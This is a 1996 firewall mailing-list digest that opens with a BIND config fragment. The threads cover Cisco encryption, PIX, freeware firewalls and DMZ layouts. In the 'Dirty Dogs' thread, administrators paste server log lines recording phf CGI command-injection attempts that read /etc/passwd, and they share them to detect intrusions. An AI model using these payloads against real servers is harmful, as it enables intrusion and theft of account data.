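primary     1.168.192.in-addr.arpa    192.168.1.rev
primary     0.0.127.in-addr.arpa      localhost.rev
cache       .                         root.cache
; everything not answered locally is sent to the external server ...
forwarders  1.2.3.4
; ... and ONLY there: slave makes the server forward-only, so it does not
; try the root servers or anyone else when 1.2.3.4 is slow or down
slave

; named.boot on the EXTERNAL (firewall) nameserver at 1.2.3.4.
; Its example.com.zone lists only the hosts reachable from outside.
directory   /etc/namedb
primary     example.com               example.com.zone
primary     0.0.127.in-addr.arpa      localhost.rev
cache       .                         root.cache
; only the legitimate secondary may pull the zone with AXFR
xfrnets     5.6.7.8
```

Both files load into a stock bind-4.9.3 named; the zone files they reference are ordinary master files and are not reproduced here. Note that `xfrnets` restricts transfers from this server only: as Louis points out, a secondary that has taken a copy will hand it to anyone unless it carries an `xfrnets` line of its own.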
From firewalls-owner Thu Jul 11 07:04:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA13346 for firewalls-outgoing; Thu, 11 Jul 1996 06:46:13 -0700 (PDT) Received: from sys3.cambridge.uk.psi.net (sys3.cambridge.uk.psi.net [154.32.106.10]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id GAA13319 for ; Thu, 11 Jul 1996 06:46:00 -0700 (PDT) Received: from i-co.co.uk by sys3.cambridge.uk.psi.net (8.7.5/SMI-5.5-UKPSINet) Received: from xi.i-co.co.uk by i-co.co.uk (5.x/SMI-SVR4) Received: from adamis.co.uk by xi.i-co.co.uk (SMI-8.6/SMI-SVR4) Received: by adamis.co.uk (SMI-8.6/SMI-SVR4) Date: Thu, 11 Jul 1996 14:42:21 +0100 From: steve@i-co.co.uk (Steve England) Message-Id: <199607111342.OAA02855@adamis.co.uk> To: firewalls@greatcircle.com Subject: CISCO network level encryption & key lengths X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Reading CISCO's online technology briefs for the forthcoming (is there a firm release date ?) IOS 11.2 which includes network level encryption services (DES encryption) (http://www.cisco.com/warp/public/732/Security/ncryp_tc.htm) functionally it's exactly what we need to set up various distinct user groups - however, according to Diffie, Blaze, Rivest et al (http://www.bsa.org/policy/encryption/cryptographers.html) the exportable key length (40 bits) is far too small, even the domestic length (according to them) (56 bits) doesn't cut it. Question is, can anyone tell me if there is any chance of this key length being extended to around 75+ bits ? will the US State Dept. relax its restrictions as not to hinder US commerce ? If the answers to the above are all "no" then does anyone have any alternative product suggestions - that fall in line with the network level encryption CISCO are producing ?
Regards Steve From firewalls-owner Thu Jul 11 07:24:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA16075 for firewalls-outgoing; Thu, 11 Jul 1996 07:12:02 -0700 (PDT) Received: from relay4.smtp.psi.net (relay4.smtp.psi.net [38.9.52.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id HAA16063 for ; Thu, 11 Jul 1996 07:11:56 -0700 (PDT) Received: from uu6.psi.com by relay4.smtp.psi.net (8.7.5/SMI-5.4-PSI) Received: from larry.dcbnet.com by uu6.psi.com (5.65b/4.0.071791-PSI/PSINet) via SMTP; Received: from jmccain.dcbnet.com (mccain [205.166.54.68]) by larry.dcbnet.com (8.6.12/8.6.12) with SMTP id JAA17072 for ; Thu, 11 Jul 1996 09:10:16 -0500 Message-Id: <199607111410.JAA17072@larry.dcbnet.com> X-Sender: jmccain@dcbnet.com X-Mailer: Windows Eudora Version 1.4.4 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 Jul 1996 09:16:22 -0500 To: Firewalls@GreatCircle.COM From: jmccain@dcbnet.com (John McCain) Subject: Re: Dirty Dogs Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I got one just this week! Maybe we should share the source addresses? wil-de1-06.ix.netcom.com - - [07/Jul/1996:22:47:32 -0500] "GET /cgi-bin/phf?QALIAS=x%0A/bin/cat%20/etc/passwd HTTP/1.0" 403 - Cheers, John From firewalls-owner Thu Jul 11 07:27:17 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id GAA14109 for firewalls-outgoing; Thu, 11 Jul 1996 06:51:34 -0700 (PDT) Received: from gatekeeper.qualix.com (gatekeeper.qualix.com [192.91.182.105]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id GAA14068 for ; Thu, 11 Jul 1996 06:51:22 -0700 (PDT) Received: from qualix.qualix by gatekeeper.qualix.com (8.6.9/Q940531.1) Received: from qualix20.qualix by qualix.qualix (4.1/SMI-4.1-Q931113.1) Received: from spirit.qualix by qualix20.qualix (SMI-8.6/SMI-SVR4) Received: by spirit.qualix (5.x/SMI-SVR4) From: security@qualix.com (Nik I. 
Knoth) Message-Id: <9607111345.AA22954@spirit.qualix> Subject: Re: firewall-1: Host Properties Problem To: murchiso@vivid.newbridge.com (Roderick Murchison, Jr.) Date: Thu, 11 Jul 1996 06:45:06 -0700 (PDT) Cc: firewalls@greatcircle.com In-Reply-To: from "Roderick Murchison, Jr." at Jul 10, 96 05:54:37 pm X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Try, with firewall running, re-clicking the SNMP fetch and let it find the IFs. -nik -- /\/ik I. / > > Hey everybody... > > There is probably something really stupid that I am missing here, but in > the "Host Properties" window, how do you delete an interface? I'm > running version 2.0e and was messing around with a few added interfaces > and different subnet masks... now I can't delete them. If I wipe them > out and try to save, it just gives me a warning about a blank entry and > retains the old settings. > > Thanks for any info... > -r > > Roderick Murchison, Jr. murchiso@newbridge.com > Newbridge Networks, Inc. 
office: (703) 708-5930 > Product Manager - VIVID ACS fax: (703) 708-5937 > Herndon, VA 22070-5241 http://www.vivid.newbridge.com > > > From firewalls-owner Thu Jul 11 07:41:35 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id HAA17244 for firewalls-outgoing; Thu, 11 Jul 1996 07:29:03 -0700 (PDT) Received: from cet.cet.com (cet.cet.com [204.227.191.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id HAA17208 for ; Thu, 11 Jul 1996 07:28:49 -0700 (PDT) Received: from cet.cet.com (roberth@cet.cet.com [204.227.191.1]) by cet.cet.com (8.6.12/8.6.12) with SMTP id HAA30267; Thu, 11 Jul 1996 07:25:53 -0700 Date: Thu, 11 Jul 1996 07:25:52 -0700 (PDT) From: Robert Hanson To: Gunnar Ingvi Thorisson cc: Howard Hantman , dcarney@hypersurf.com Subject: Re: Dirty dogs In-Reply-To: <199607111309.NAA10529@linda.if.is> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: firewalls-owner@GreatCircle.COM Precedence: bulk OK, logic... didn't get the passwords, but I got the beef on the users... now I can shoot at the people... or human engineering... etc etc etc... ---> Robert H. Hanson LAN/WAN Consultant - Internet Service Provider Otis Orchards, Wa. Cutting Edge Communications www.cet.com (509) 927-9541 finger: info@cet.com or email: roberth@cet.com On Thu, 11 Jul 1996, Gunnar Ingvi Thorisson wrote: > > now that you've published your vulnerability to the world, I hope you're > > disabling the script! > > Is that a question? Did that before I posted to that list, however, I > tried out that script and it looks like he was not able to read my > shadowed password file but only the /etc/passwd since the http daemon > runs under suid www. > > > Howard Hantman > > Manager, Technology Integration > > Corporate ITS > > Raytheon Company > > Best regards..
> > > ========================================================================= > Gunnar Ingvi Þórisson E-Mail address: gunni@if.is > Kerfisstjóri og forritari, system administrator and programmer > > Íslensk forritaþróun hf. (Iceland Software Inc.) > Suðurlandsbraut 4, IS-108 Reykjavík, Ísland > Sími: (+354) 588-1511 Fax: (+354) 588-8728 > ========================================================================= > From firewalls-owner Thu Jul 11 08:20:56 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA20973 for firewalls-outgoing; Thu, 11 Jul 1996 08:06:20 -0700 (PDT) Received: from perigee.com (mail.perigee.com [204.147.95.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id IAA20965 for ; Thu, 11 Jul 1996 08:06:13 -0700 (PDT) Received: from smtp.dcc.com ([204.147.93.69]) by gateway.perigee.com with SMTP id <26513>; Thu, 11 Jul 1996 10:08:19 -0500 Received: by smtp.dcc.com with Microsoft Mail From: "Moubray, Steve" To: "'firewalls@greatcircle.com'" Subject: PIX Question Date: Thu, 11 Jul 1996 12:02:00 -0500 Message-ID: <31E533EB@smtp.dcc.com> X-Mailer: Microsoft Mail V3.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Perhaps I'm missing something (it wouldn't be the first time) but I'm having a discussion with a colleague about PIX. After reading the white papers, talking to a local Cisco rep and a few users of PIX, it seems to be a router with some advanced features. My colleague insists that it does not route packets, works at the application layer and is very different than similar products that do NAT.
I understand the concept of stateful filtering and I can accept that in some cases it does work at the application layer but is it establishing new connections and does it always function at the application layer? Maybe Cisco could comment on the technical aspects but I'd like to hear from others on the security and use aspects. (To Cisco, how does it handle UDP?) I guess I could always get a PIX in here and test it but that would take more time than I have for the next few weeks and I'm trying to get a free lunch before then (from the colleague of course). If anyone helps with good information without starting a flame war, I'll even split the lunch with you. You'll have to figure out the logistics though. Then again maybe I'll have to buy the lunch (that might be a first). TIA ~ Steve ---------------------------------------- Steve Moubray smoubray@perigee.com Perigee Communications Inc "Networking and Beyond" From firewalls-owner Thu Jul 11 09:20:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA25078 for firewalls-outgoing; Thu, 11 Jul 1996 08:49:03 -0700 (PDT) Received: from phobos.frii.com (phobos.frii.com [204.144.241.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA25047 for ; Thu, 11 Jul 1996 08:48:54 -0700 (PDT) Received: from rogermay (isdn119.pageplus.com [206.168.18.119]) by phobos.frii.com (8.6.12/8.6.9) with SMTP id JAA29045 for ; Thu, 11 Jul 1996 09:45:25 -0600 Message-ID: <31E52191.4803@frii.com> Date: Thu, 11 Jul 1996 09:45:21 -0600 From: "Roger A.
May" Reply-To: rogermay@frii.com Organization: R & R Enterprises X-Mailer: Mozilla 3.0b5Gold (Win95; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Re: Dirty Dogs References: <199607111410.JAA17072@larry.dcbnet.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am not sure as of yet, but I would say that someone has come up with a program that they have passed out to their 'buddies' and that is why so many source domains have been reported in the logs. Any ideas as to where one would look to see what is the 'latest and greatest' hacker program? Possibly to get a copy or its source to fight against it. Roger A. May John McCain wrote: > > I got one just this week! Maybe we should share the source addresses? > > wil-de1-06.ix.netcom.com - - [07/Jul/1996:22:47:32 -0500] "GET > /cgi-bin/phf?QALIAS=x%0A/bin/cat%20/etc/passwd HTTP/1.0" 403 - From firewalls-owner Thu Jul 11 09:20:31 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA25575 for firewalls-outgoing; Thu, 11 Jul 1996 08:54:05 -0700 (PDT) Received: from relay.ashton.csc.com (relay.ashton.csc.com [20.2.54.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id IAA25566 for ; Thu, 11 Jul 1996 08:53:58 -0700 (PDT) Received: by relay.ashton.csc.com; id LAA08383; Thu, 11 Jul 1996 11:53:39 -0400 Received: from ckostick.sed.csc.com(20.2.53.154) by relay.ashton.csc.com via smap (g3.0.1) Received: by ckostick.sed.csc.com with Microsoft Mail Message-ID: <01BB6F1F.52A2F060@ckostick.sed.csc.com> From: Chris Kostick To: "firewalls@GreatCircle.COM" Subject: RE: CISCO network level encryption & key lengths Date: Thu, 11 Jul 1996 11:51:37 -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Steve England[SMTP:steve@i-co.co.uk] wrote: > > > Reading CISCO's online technology briefs for the forthcoming (is there a > firm release date ?)
IOS 11.2 which includes network level encryption services > (DES encryption) (http://www.cisco.com/warp/public/732/Security/ncryp_tc.htm) > functionally it's exactly what we need to set up various distinct user groups > - however, according to Diffie, Blaze, Rivest et al > (http://www.bsa.org/policy/encryption/cryptographers.html) > the exportable key length (40 bits) is far too small, even the domestic > length (according to them) (56 bits) doesn't cut it. This one has always bothered me a little - '40 bits is way too small.' There are 1,099,511,627,776 possible combinations of a key. Given today's technology it is crackable using brute force methods. But, who is going to do that? A person or persons have to have *a lot* of CPU power to crack it in a reasonable amount of time unless they get really really lucky. A government can do it fairly fast I imagine. Larger corporations like IBM, Microsoft, DEC, Citicorp, DOW, Exxon, etc. can probably supply the horsepower needed. Are these people your adversaries? If not, then your risk is not as great as people like Diffie, Blaze and Rivest make it out to be. > > Question is, can anyone tell me if there is any chance of this key length > being extended to around 75+ bits ? will the US State Dept. relax its > restrictions as not to hinder US commerce ? I don't think anyone should touch that question with a ten foot pole. It seems to make sense, the US government is budging on the issue. Go figure. Anyway, anyone who 'claims' to know the answer is full of crap. Everyone knows it is something that has to (i.e. should) happen, but no one knows when. > > If the answers to the above are all "no" then does anyone have any alternative > product suggestions - that fall in line with the network level encryption > CISCO are producing ? Rumor alert! I once heard there are Japanese companies selling library implementations of DES, 3-DES, etc.
A company such as Cisco could conceivably start an offshore company, obtain the outside encryption s/w (why rewrite it), and sell their new router to non-US customers. Some interoperability testing might be a problem (on the encryption side) with the US product, but it should work. Note, I'm not endorsing this, just making a comment. End rumor alert. -- chris From firewalls-owner Thu Jul 11 09:34:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA26586 for firewalls-outgoing; Thu, 11 Jul 1996 09:06:14 -0700 (PDT) Received: from halon.sybase.com (halon.sybase.com [192.138.151.33]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA26574 for ; Thu, 11 Jul 1996 09:06:03 -0700 (PDT) Received: from smtp1.sybase.com (sybgate) by halon.sybase.com (5.x/SMI-SVR4/SybFW4.0) Received: from notesgw2.sybase.com by smtp1.sybase.com (4.1/SMI-4.1/SybH3.5-030896) Received: by notesgw2.sybase.com (5.x/SMI-4.1/SybEGW3.3) Message-Id: <9607111603.AA21167@notesgw2.sybase.com> Received: by SybaseNotes (Lotus Notes Mail Gateway for SMTP V1.1) id To: "Moubray Steve" Cc: "'firewalls@greatcircle.com'" From: Ryan.Russell/SYBASE Date: 11 Jul 96 9:04:46 EDT Subject: Re: PIX Question X-Lotus-Type: Reply All Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It depends on what you call a router... It does forward packets (after doing its thing) based on layer 3 info, which is what I call a router. Plus, in practical terms, you set it as a "gateway" on your routers or hosts. Ryan ---------- Previous Message ---------- To: firewalls cc: From: SMOUBRAY @ DCC.COM ("Moubray, Steve") @ smtp Date: 07/11/96 12:02:00 PM Subject: PIX Question Perhaps I'm missing something (it wouldn't be the first time) but I'm having a discussion with a colleague about PIX. After reading the white papers, talking to a local Cisco rep and a few users of PIX, it seems to be a router with some advanced features.
My colleague insists that it does not route packets, works at the application layer and is very different than similar products that do NAT. I understand the concept of stateful filtering and I can accept that in some cases it does work at the application layer but is it establishing new connections and does it always function at the application layer? Maybe Cisco could comment on the technical aspects but I'd like to hear from others on the security and use aspects. (To Cisco, how does it handle UDP?) I guess I could always get a PIX in here and test it but that would take more time than I have for the next few weeks and I'm trying to get a free lunch before then (from the colleague of course). If anyone helps with good information without starting a flame war, I'll even split the lunch with you. You'll have to figure out the logistics though. Then again maybe I'll have to buy the lunch (that might be a first). TIA ~ Steve ---------------------------------------- Steve Moubray smoubray@perigee.com Perigee Communications Inc "Networking and Beyond" From firewalls-owner Thu Jul 11 09:51:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA27194 for firewalls-outgoing; Thu, 11 Jul 1996 09:13:45 -0700 (PDT) Received: from grumpy.mossbaygroup.com (mossbgrp.mossbaygrp.com [206.213.65.153]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id JAA27178 for ; Thu, 11 Jul 1996 09:13:34 -0700 (PDT) Received: from [206.213.85.33] by grumpy.mossbaygroup.com (NTMail 3.01.03) id aa000078; Thu, 11 Jul 1996 09:08:01 -0700 Received: by JFlahiff.mossbaygroup.com with Microsoft Mail Message-ID: <01BB6F08.6FE32800@JFlahiff.mossbaygroup.com> From: "Joseph M. Flahiff" To: "'Firewalls Listserv'" Subject: Freeware Date: Thu, 11 Jul 1996 09:07:41 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Info: Evaluation version at grumpy.mossbaygroup.com X-Info: Moss Bay Group, Inc.
Advisors In Technology Management Sender: firewalls-owner@GreatCircle.COM Precedence: bulk What are people's experiences with freeware products for firewalling, proxy, etc.? Good, bad, dangerous? TIA Joseph Flahiff Moss Bay Group, Inc. Advisors in Technology Management From firewalls-owner Thu Jul 11 09:51:38 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA26752 for firewalls-outgoing; Thu, 11 Jul 1996 09:08:54 -0700 (PDT) Received: from earth.usa.net (earth.usa.net [192.156.196.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA26743 for ; Thu, 11 Jul 1996 09:08:47 -0700 (PDT) Received: (from mec@localhost) by earth.usa.net (8.7.5/8.7.5) id KAA07245; Thu, 11 Jul 1996 10:05:45 -0600 (MDT) Date: Thu, 11 Jul 1996 10:05:43 -0600 (MDT) From: "Matthew Cable/USA.NET Inc." X-Sender: mec@earth To: Jean-Francois Zwobada cc: Stefan Berg , firewalls@GreatCircle.com Subject: Re: News-proxy for TIS fwtk? In-Reply-To: <31E38F8E.7766@apogee-com.fr> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 10 Jul 1996, Jean-Francois Zwobada wrote: > Just use the plug-gw as this > > plug-gw: port nntp InternalNewsServer -plug-to ExternalNewsServer -port > nntp > plug-gw: port nntp ExternalNewsServer -plug-to InternalNewsServer -port > nntp > keep in mind, this setup will only allow you to have one incoming feed, as all feeds will appear to come from the proxy machine, no matter what host they are coming from on the outside. 
#!/usr/bin/perl -- Matthew Cable -- USA.NET -- Senior System Administrator $fof='8a*)v2*^Gf#*5S="!jh!;F)]#T):)#&f5kR^(%!E#;0>#:|#8)#;P#80#:o#;)#; From firewalls-owner Thu Jul 11 10:09:06 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA00217 for firewalls-outgoing; Thu, 11 Jul 1996 09:49:18 -0700 (PDT) Received: from tera.bctel.net (tera.bctel.net [204.174.64.252]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id JAA00206 for ; Thu, 11 Jul 1996 09:49:11 -0700 (PDT) Received: (from nobody@localhost) by tera.bctel.net (8.7.4/8.7.1) id JAA01667; Thu, 11 Jul 1996 09:40:12 -0700 (PDT) Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) Received: (from murrell@localhost) by mocha.bctel.net (8.7.5/8.7.3) id JAA16682; Thu, 11 Jul 1996 09:45:50 -0700 (PDT) From: Brian Murrell Message-Id: <199607111645.JAA16682@mocha.bctel.net> Date: Thu, 11 Jul 1996 09:45:48 -0700 (PDT) To: hhantman@eo.ray.com Cc: dcarney@hypersurf.com, james@mail.state.mo.us, firewalls@GreatCircle.COM Subject: Re[2]: Dirty dogs In-Reply-To: <9607111219.AA25794@eo.ray.com> X-Mailer: Ishmail 1.2.2-960610-sol24 MIME-Version: 1.0 Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk from the quill of hhantman@eo.ray.com (Howard Hantman) on scroll <9607111219.AA25794@eo.ray.com> > Well, folks, whether or not you try to contact genstar.net or zilker.net > is > one issue, but I would definitely do SOMETHING, at least on your own > systems. > Both of these log snippets indicate a SUCCESSFUL use of this attack. > Especially > now that you've published your vulnerability to the world, I hope you're > disabling the script! Not necessarily. Those look similar to the log files on our server, however if one looks at the corresponding errors file (for the Netscape server) one will notice error messages regarding the access and how the file could not be found. b. -- Brian J.
Murrell
Brian_Murrell@bctel.net    BCTel Advanced Communications
brian@ilinx.com            Vancouver, B.C.
brian@wimsey.com           604 454 5279

From firewalls-owner Thu Jul 11 11:05:47 1996
From: Don_Tompkins@esd.tracor.com
Date: Thu, 11 Jul 1996 13:35:41 -0400
Message-Id: <1e53be30@esd.tracor.com>
Subject: Re: Freeware
To: firewalls@GreatCircle.COM, "Joseph M. Flahiff"

Have tended to use commercial products for security applications. But have used freeware with good results on other projects including some with demanding requirements.

A general comment: Freeware, shareware, and commercial ware are just different methods of providing products. Quality of product has more to do with factors such as the author(s) and design methods and tools than it does with distribution method. More formal or rigorous methods are important with security products and other critical hardware and software. Beyond the philosophy, availability for specific applications can also depend on resources and interest within government, academia, and industry.

______________________________ Reply Separator _________________________________
Subject: Freeware
Author: "Joseph M. Flahiff" at ESD
Date: 7/11/96 9:07 AM

What are people's experiences with freeware products for firewalling, proxy, etc.?
Good, bad, dangerous?

TIA

Joseph Flahiff
Moss Bay Group, Inc.
Advisors in Technology Management

From firewalls-owner Thu Jul 11 11:12:58 1996
From: Shepherd Rudie
To: "'firewalls@greatcircle.com'"
Subject: Catapult and user authentication
Date: Thu, 11 Jul 1996 19:52:19 +0200

We are busy playing with Microsoft Catapult on an NT 4.0 beta 2 box. When I add some users to the WWW service, the proxy returns an error (on the browser). If I set access rights to Everybody, it works fine but with obvious limitations. The "Active Connections" window states that all users are connecting as "anonymous" (thus the Everybody setting).

What's going on here? Where's the fancy NT authentication like in Information Server?

Another thing... Is there something like the FWTK plug-gw for NT to plug mail and news?

Any help greatly appreciated.
Rudie

From firewalls-owner Thu Jul 11 11:41:36 1996
Message-Id: <2.2.32.19960711180903.0068ef80@earthlink.net>
Date: Thu, 11 Jul 1996 13:09:03 -0500
To: firewalls@GreatCircle.com
From: Jim Minie
Subject: RE: CISCO network level encryption & key lengths

>> If the answer to the above are all "no" then does anyone have any alternative
>> product suggestions - that fall in line with the network level encryption
>> CISCO are producing ?
>
> Rumor alert! I once heard there are Japanese companies selling library
> implementations of DES, 3-DES, etc. A company such as Cisco could conceivably
> start an offshore company, obtain the outside encryption s/w (why rewrite it),
> and sell their new router to non-US customers. Some interoperability testing
> might be a problem (on the encryption side) with the US product, but it should
> work. Note, I'm not endorsing this, just making a comment. End rumor alert.
>
> --
> chris
>

Canadian companies whose encryption methodologies can't be regulated by the U.S. State Department are doing a brisk business within the U.S. and maintaining that level of security throughout the world. I.e. Nortel Entrust. Maybe not falling in line with Cisco, but an alternate...
Have you considered Virtual Private Networking via a firewall system to create the distinct user groups? It's just an idea. If you're talking individual users the cost would be way out of line.

From firewalls-owner Thu Jul 11 11:50:10 1996
Message-Id: <2.2.32.19960711183808.006b273c@earthlink.net>
Date: Thu, 11 Jul 1996 13:38:08 -0500
To: firewalls@greatcircle.com
From: Jim Minie
Subject: Re: Freeware

Would you attempt to build your own virus software based on the knowledge that you've 'seen a few virii in your time'? There are more ways around most firewalls than is ever discussed in this group. IMHO, to create your own firewall without continual knowledge of what new attacks are being created almost daily is an act of network suicide... Getting in with a reputable firewall company who maintains this knowledge and passes updates along is very similar to quality virus companies who provide constant updates to their product addressing new strains.

At 09:07 AM 7/11/96 -0700, you wrote:
> What are people's experiences with freeware products for firewalling, proxy, etc.? Good, bad, dangerous?
>
> TIA
>
> Joseph Flahiff
> Moss Bay Group, Inc.
> Advisors in Technology Management
>
>
>

________________________________________________________________
Jim Minie                                Network Systems Engineer
Milkyway Networks, Inc.                  phone: (314) 275-4499
12400 Olive Blvd. Suite 555              fax:   (314) 523-4554
St. Louis, MO 63141-5439                 e-mail: jminie@milkyway.com
"Nothing gets out of the Milkyway Black Hole Firewall"
________________________________________________________________

From firewalls-owner Thu Jul 11 12:06:15 1996
Message-Id: <31E56A6D.14A3@twentieth-century.com>
Date: Thu, 11 Jul 1996 13:56:13 -0700
From: Shelly Nuessle
Organization: Twentieth Century Services
To: Firewalls@GreatCircle.COM
Subject: Re: Web Server on DMZ
References: <199607102032.NAA21108@miles.greatcircle.com>

Dave Wreski asks

On Wed, 10 Jul 1996, Bob Konigsberg wrote:
>>
>> The job of the Corp-Firewall is to protect the company network, the
>> job of the outer firewall is to protect the exposed servers.
>>
>> If necessary, the outer firewall can also be used as a backup corp
>> firewall. Or better yet, to complement it by using a different
>> technology
>> which will help make your network harder to crack into.
> What type of different technology do you recommend? This sounds
> interesting, as this is how we currently implement our
> firewalls/servers..

Well, we have ours dual homed, taking tcp/ip one way and NetBEUI the other. And we have some additional application level stuff going on the WWW. And we are limiting services on the WWW server...

Shelly

From firewalls-owner Thu Jul 11 12:35:32 1996
From: mdr@vodka.sse.att.com
Message-Id: <199607111925.OAA25005@ihig2.att.att.com>
Subject: Re: Web Server on DMZ
To: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg)
Date: Thu, 11 Jul 1996 15:30:38 -0400 (EDT)
Cc: Firewalls@GreatCircle.COM, ggh14854@ussun2f.glaxo.com
In-Reply-To: <9607101802.AA02049@manzanita.DEV.3Com.COM.noname> from "Bob Konigsberg" at Jul 10, 96 11:02:56 am

> BobK wrote:
> Yes, you can put the web server on your DMZ, but the real answer here
> is to run TWO firewalls.
>
> Like so:
>
> --company net ---/Corp-Firewall/---DMZ w/servers---/outer firewall/ --Internet
>

A single triple-homed firewall can accomplish the same thing I think.
--company net ---/Corp-Firewall/ --Internet
                        |
                        |
                     servers

Mark Riggins

From firewalls-owner Thu Jul 11 13:19:52 1996
To: firewalls@greatcircle.com
Subject: Re: Re[2]: Dirty dogs
References: <199607111645.JAA16682@mocha.bctel.net>
X-Url: http://www.miranova.com/%7Esteve/
From: Steven L Baur
In-Reply-To: Brian Murrell's message of Thu, 11 Jul 1996 09:45:48 -0700 (PDT)
Date: 11 Jul 1996 13:03:19 -0700

>>>>> "Brian" == Brian Murrell writes:

Brian> from the quill of hhantman@eo.ray.com (Howard Hantman) on scroll

>> Both of these log snippets indicate a SUCCESSFUL use of this attack.

Brian> Not necessarily. Those look similar to the log files on our server,
Brian> however if one looks at the corresponding errors file (for the Netscape
Brian> server) one will notice error messages regarding the access and how the
Brian> file could not be found.

Unsuccessful references should show a result code in the 400s and no bytes sent.
unix.sbu.ac.uk - - [06/Jun/1996:01:30:41 -0700] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Apwd%0Aid%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 404 -
nor-va3-12.ix.netcom.com - - [13/Jun/1996:19:56:48 -0700] "GET /cgi-bin/phf?Qname=root%0Acat%20/etc/passwd HTTP/1.0" 404 -
annex058.ridgecrest.ca.us - - [14/Jun/1996:14:43:13 -0700] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Aid%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 404 -

--
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone except you in November.

From firewalls-owner Thu Jul 11 13:34:46 1996
Message-ID: <01BB6F2C.6AE41FC0@JFlahiff.mossbaygroup.com>
From: "Joseph M. Flahiff"
To: "'Firewalls Listserv'"
Subject: RE: Freeware
Date: Thu, 11 Jul 1996 13:25:15 -0700
X-Info: Evaluation version at grumpy.mossbaygroup.com
X-Info: Moss Bay Group, Inc.
Advisors In Technology Management

----------
From: Jim Minie[SMTP:jminie@milkyway.com]
Sent: Thursday, July 11, 1996 11:38 AM
To: firewalls@greatcircle.com
Subject: Re: Freeware

Would you attempt to build your own virus software based on the knowledge that you've 'seen a few virii in your time'? There are more ways around most firewalls than is ever discussed in this group. IMHO, to create your own firewall without continual knowledge of what new attacks are being created almost daily is an act of network suicide... Getting in with a reputable firewall company who maintains this knowledge and passes updates along is very similar to quality virus companies who provide constant updates to their product addressing new strains.

Whoa! Sorry for asking!

Are you saying you have had a poor experience? I am not asking for personal opinions. I am looking for anecdotes, stories, examples, you know...experiences. Hence the wording of my question. "What are people's _experiences_..." I feel the same way you do. But, I thought, "It is a big world and maybe there is something I don't know about."

I was not talking about creating firewall software myself. But someone somewhere has to write the stuff. Who is to say that there is not some group of benevolent geniuses out there somewhere, fighting for right and doing it just because it is right not because they can make a buck doing it.

At 09:07 AM 7/11/96 -0700, you wrote:
> What are people's experiences with freeware products for firewalling, proxy, etc.? Good, bad, dangerous?
>
> TIA
>
> Joseph Flahiff
> Moss Bay Group, Inc.
> Advisors in Technology Management

From firewalls-owner Thu Jul 11 13:50:03 1996
From: johnstm@anubis.network.com (Tony M Johnson)
Message-Id: <9607112015.AA27387@anubis.network.com>
Subject: RE: CISCO network level encryption & key lengths
To: firewalls@greatcircle.com
Date: Thu, 11 Jul 1996 15:15:48 -0500 (CDT)

====================================================================
Tony Johnson                    Email: johnstm@anubis.network.com
Network Systems                 Voice: (612) 391-1176
7600 Boone Avenue North         Fax  : (612) 424-2853
Minneapolis, MN 55428
====================================================================

>> If the answer to the above are all "no" then does anyone have any alternative
>> product suggestions - that fall in line with the network level encryption
